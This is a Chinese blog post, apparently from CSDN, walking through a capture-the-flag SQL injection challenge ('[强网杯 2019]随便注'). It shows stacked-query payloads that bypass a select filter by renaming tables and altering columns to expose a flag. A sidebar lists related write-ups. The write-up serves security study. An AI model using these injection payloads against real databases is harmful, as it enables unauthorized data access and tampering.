记录强网杯堆叠注入的一道题目

已于 2023-08-18 00:01:32 修改
阅读量82 收藏
点赞数
文章标签: web安全 sql
于 2023-08-18 00:01:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74989372/article/details/132345921
版权

BUUCTF中一道SQL注入的题目,按正常思路做,到第三步的时候发现select被过滤了

 按照以往的方式,盲注报错注入等方式已经不适用了,尝试bypass无果,好像都要和select扯上关系,这便引出了堆叠注入的应用。

尝试用堆叠注入查询所有数据库,执行成功

直接查询当前数据库的表,判断words表是我们应该查询的表

 查询words表,发现其中的内容都没啥用

 之前还有一个一大串数字的表,查询发现无回显。

 像是这种一长串的表名,需要在外面加一个反引号``,果然查询到一个名为flag的列

 答案已经近在咫尺了,但是对方过滤了select,我么无法直接查询到flag

虽然我们上传不了select,但是对方本身是有select查询语法的

在当前页面有个与数据库交互的操作。id=1,2,3

那么这里是从word表里面进行查询

前面说过,我们可以通过堆叠注入进行增删改查,那么此时我们可以把1919810931114514改为words表,然后添加id参数,再把原来的words给改为其他

讲白了就是占别人的窝

OK 开始

mysql里修改表名的操作:

把默认的 words 改为 ww

        ALTER TABLE words RENAME TO word22;

把1919810931114514改为words

        ALTER TABLE `1919810931114514` RENAME TO words;

往words表里新增一个字段 id

        ALTER TABLE wrods ADD id int(10) DEFAULT '12';

修改word里面flag为data

        ALTER TABLE words CHANGE flag data VARCHAR(100);

然后把以上语句进行堆叠

1';rename table words to word22;rename table `1919810931114514` to words;ALTER TABLE wrods ADD id int(10) DEFAULT '12';ALTER TABLE words CHANGE flag data

将该语句执行后,再次搜索 12 即可查询到 flag 内容。但是要注意一点,上面的步骤不能一行一行的执行,要堆叠后一次全部执行掉,否则对words表改名后系统将无法执行查询功能,你就再也无法得到flag了

阿厂闯荡安全圈
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
强网杯SQL题目复现php.zip
12-17
【描述】描述中的“强网杯”是指一项网络安全竞赛,该比赛通常包括各种技术领域的题目,如SQL注入等。提到的“SQL题目复现php.zip”表明这是一个用于帮助参赛者理解和解决SQL相关问题的PHP代码集合,可能包括了模拟...
2018强网杯CTF-题目整理-校本图片Readme.zip
12-18
2018强网杯CTF___题目整理 │ ├── 01Misc-4题 │ ├── 题目名称:ai-nimals │ │ └── 题目名称:ai-nimals.mhtml │ ├── 题目名称:welcome │ │ └── 题目名称:welcome.mhtml │ ├── 题目名称:...
WEB漏洞攻防 - SQL注入 - 堆叠注入
易编橙 · 终身成长社群,相遇已是上上签!
07-31 749
实际应用场景中,堆叠注入遇到的会很少,大部分会在CTF比赛中遇到。主要原因是,堆叠注入的利用看起来很厉害但是其可能会受到 API、数据库引擎或者权限的控制。只有当调用函数库函数支持执行多条语句执行的时候才可以利用。
堆叠注入之[强网杯 2019]随便注
Aiwin的博客
05-26 697
堆叠注入之[强网杯 2019]随便注各详解
攻防世界supersqli-强网杯随便注(堆叠注入顶级练手题目
yuanxu8877的博客
11-28 814
攻防世界supersqli-强网杯随便注(堆叠注入顶级练手题目
[强网杯 2019]随便注 —— 堆叠注入
weixin_46962006的博客
12-12 2467
                       [强网杯 2019]随便注 1 前言        个人观点,若有误请指教 解题思路及步骤 直接上’引号,结果直接报错了,证明存在sql注入漏洞。 判断当前表一共有几列,可得一共两列 获得当前表的内容,很明显当前表没有flag 注:是不是很蒙?竟然可以直接获得当前表的内容,那我干嘛还要在上面测试表有多少列?其实不是的,你在网页看到一共有几列就证明在数据库中的当前表就只有几列吗?就不能少几列给你看?当然,这道确实显示的列数和在数据库的当前表
堆叠注入原理解析
qq_45927819的博客
03-19 7791
文章目录一、堆叠注入原理二、堆叠注入触发条件三、题目 一、堆叠注入原理 mysql数据库sql语句的默认结束符是以;结尾,在执行多条SQL语句时就要使用结束符隔开,那么在;结束一条sql语句后继续构造下一条语句,是否会一起执行? 因此这个想法也就造就了堆叠注入 二、堆叠注入触发条件 堆叠注入触发的条件很苛刻,因为堆叠注入原理就是通过结束符同时执行多条sql语句,这就需要服务器在访问数据端时使用的是可同时执行多条sql语句的方法,例如php中的mysqli_multi_query函数。但与之相对应的mysql
SQL注入堆叠注入-强网杯[随便注]
qq_68163788的博客
02-22 1124
堆叠注入是指攻击者在SQL注入攻击中利用多个查询语句的堆叠,从而绕过应用程序的输入验证,进而执行恶意的SQL代码。攻击者可以通过在输入参数中插入分号或者其他分隔符,使得应用程序在执行SQL查询时将恶意代码与原有查询语句堆叠在一起,从而绕过输入验证,执行恶意代码。 堆叠注入攻击可以导致严重的安全问题,包括数据泄露、数据篡改甚至数据库服务器的完全控制。为了防止堆叠注入攻击,开发人员应该采取一系列安全措施,包括对输入参数进行严格的验证和过滤,使用参数化查询等安全措施来防止SQL注入攻击的发生。
[强网杯 2019]随便注 堆叠注入
学生
05-25 138
[强网杯 2019]随便注 堆叠注入 11/20/2020 多云 轻松 .-------------------------------------------------------------------. 所谓堆叠注入,就是一次性执行多条查询语句 获取数据库 ?inject=1';show databases;--+ [OUTPUT]: array(1) { [0]=> string(11) "ctftraining" } array(1) { [0]=> string(18) "i
sql-堆叠注入
zhhhb1005的博客
08-14 510
前几星期写题时遇见了好几道关于堆叠注入题目,结果发现我对堆叠注入不是特别了解,所以写一下博客记录一下,但是发现堆叠注入使用的场景和条件好像有点苛刻。
BUUCTF-堆叠注入-文件包含
m0_64180167的博客
03-28 598
提示我们是include 文件包含打开环境点击我们include 尝试直接访问根目录 失败使用伪协议base64解密。
2018强网杯CTF-题目整理.zip
12-17
2018强网杯CTF___题目整理
强网杯 WriteUp By Nu1L
08-02
强网杯 WriteUp By Nu1L》是关于2022年第六届“强网杯”全国网络安全挑战赛的一份技术分析报告,由Nu1L团队撰写。在这篇WriteUp中,作者分享了他们在竞赛中遇到的各种挑战和解决策略,涵盖了Pwn、Reverse、Find_...
网安零基础入门神书,全面介绍Web渗透核心攻击与防御方式!
最新发布
互联网架构小马的博客
07-29 771
Web安全是指Web服务程序的漏洞,通常涵盖Web漏洞、操作系统洞、数据库漏洞、中间件漏洞等。“渗透测试”作为主动防御的一种关键手段,对评估网络系统安全防护及措施至关重要,因为只有发现问题才能及时终止并预防潜在的安全风险。根据网络安全调查统计,75%的网络攻击行为都是来自Web应用层面而非网络层面所以,学习Web安全的重要性不言而喻。Web安全吸引越来越多的人学习,有人是被其炫酷感染,有人是出于对技术的热爱,但大多数人还是为了高薪资和职场发展。
WEB安全】 PHP基础与数据库教学下(超详细)
weixin_60838266的博客
07-29 1030
PHP 连接 MySQL在 PHP 使用 MySQL 数据库前,你需要先将它们连接。PHP 5 及以上版本建议使用以下方式连接 MySQL :MySQLi extension ("i" 意为 improved)在 PHP 早起版本中我们使用 MySQL 扩展。但该扩展在 2012 年开始不建议使用。我是该用 MySQLi ,还是 PDO?如果你需要一个简短的回答,即 "你习惯哪个就用哪个"。
网络安全之扫描探测阶段攻防手段(二)
子非渔
07-24 867
扫描探测阶段是攻击者对目标网络进行深入了解的关键步骤,同时也是防御者识别潜在威胁和加强安全防护的机会。
WEB安全】 PHP基础完整教学上(超详细)
weixin_60838266的博客
07-28 748
本文为Web安全学习中需要了解的php知识提高学习,PHP:Hypertext Preprocessor,中文名:“超文本预处理器”是一种通用开源脚本语言。语法吸收了C语言、java和Perl的特点,利于学习,使用广泛,主要适用于web开发领域。用PHP做出的动态页面与其他的编程语言相比,PHP是将程序嵌入到HTML(标准通用标记语言下的一个应用)文档中去执行,执行效率比完全生成HTML标记的CGI要高许多;PHP还可以执行编译后代码,编译可以达到加密和优化代码运行,使代码运行更快。
网络安全防御【IPsec VPN搭建】
miss_copper的博客
07-25 1425
防火墙的g0/0/0口默认的IP地址为192.168.0.1/24;但是我们需要在浏览器中打开FW2的web服务就需要将g0/0/0接口的IP地址修改为192.168.142.40/24与我们Clound中虚拟网卡通一个网段才行。20、将双机热备改成主备模式,通过内网的VPN设备构建一条到达分公司的IPsec VPN通道,保证10.0.2.0/24网段可以访问到192.168.1.0/24网段。登录成功之后需要修改你的密码才能进入防火墙的用户视图。IPsec策略协商成功!成功修改为主备模式!
2022强网杯pwn赛题详解:基于largebinattack的houseofapple漏洞利用
强网杯2022年的Pwn赛题解析主要聚焦于一道难度较高的题目"house_of_cat",该题挑战者需利用glibc 2.35版本中的漏洞进行攻击,这是当时Ubuntu 22.04系统上最新版glibc。题目吸引了众多参赛队伍,但因涉及高级的_...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值